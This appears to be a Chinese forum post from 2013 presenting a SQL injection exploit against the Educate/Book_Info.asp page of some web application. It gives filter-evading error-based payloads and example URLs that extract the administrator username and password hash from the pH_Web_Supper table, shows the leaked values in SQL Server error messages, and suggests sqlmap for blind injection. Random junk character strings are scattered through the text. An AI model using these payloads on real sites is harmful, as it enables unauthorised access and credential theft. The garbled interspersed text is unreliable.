漏洞出现在Educate/Book_Info.asp
- J3 x1 p. \# ]0 `: }
3 M* N' q4 Z' B. l/ d此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出) b& X5 i7 x7 v1 g
U+ M/ p$ v5 z9 Q5 {# e
exp:如下
n* z0 Q( W% X0 f% f查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)& ?" ]5 i* N: J; @. ]
查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)( X) t |0 t: a+ p0 I- f: y$ \
( L) T a! H5 s- ~/ Qhttp://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
& N4 \) E# }. q! [2 ^5 J5 h
, w, L+ A1 f% a, f5 u4 oMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'$ r" F' j2 m0 x0 c2 P; L
5 o7 e8 y6 m1 F2 F将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。
/ s5 S" x" S# I2 }
8 @) u. U" s$ S7 m& g/Educate/Book_Info.asp,行 80 U r8 z4 p1 K% T$ Q
9 d' K0 G# E) K8 X9 ^+ u& \; |
http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper): q& ~- \. G1 e, D. S! c1 v
/ _% {% r' Q3 e: H$ f8 E2 M
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
+ k7 t' N. f- t' Y/ L1 r1 V
, @+ `. V! I# j& M+ D. l7 R将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。
8 v h" M6 @1 S5 A a: }
4 m5 c, B0 t* M% I/Educate/Book_Info.asp,行 8+ P4 Q2 |* n# K9 s
|
发表于 2013-2-16 21:44:16
收藏
支持
反对